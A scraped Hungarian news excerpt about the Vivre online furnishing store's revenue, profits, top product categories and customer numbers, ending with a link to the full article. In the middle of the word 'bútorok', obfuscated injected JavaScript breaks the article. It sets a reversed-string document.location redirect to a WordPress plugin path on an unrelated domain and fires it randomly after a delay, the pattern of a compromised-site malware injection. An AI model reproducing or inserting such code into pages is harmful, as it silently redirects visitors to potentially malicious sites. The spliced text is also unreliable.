A társaság a tavalyi adózott eredményét ugyan nem közölte, de arról beszámolt, hogy 2019-ben 41,47 millió eurós árbevétel mellett, 630 ezer eurós nyereséggel zárt, 2018-ban pedig 40,68 millió eurós árbevételt ért el, adózott eredménye pedig meghaladta a 270,94 ezer eurót. A közlemény szerint tavaly a legnépszerűbb termékeik a bútoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}torok voltak, amelyek a teljes eladás 37 százalékát tették ki, második helyen álltak 11,2 százalékkal a textíliák és a szőnyegek, ezeket követték 11 százalékkal az otthoni dekorációk és kiegészítők. Az online lakberendezési áruház 2020-ban több mint 500 ezer vásárlót szolgált ki. Hozzátették, hogy a Vivre partnereinek (beszállítók és eladók) száma körülbelül 9850…
A cikk folytatódik: http://hazesotthon.co.hu/tanacsadas/2021/04/01/a-vivre-online-lakberendezesi-aruhaz-arbevetele-tavaly-50-szazalekkal-nott.html
- Hirdetés -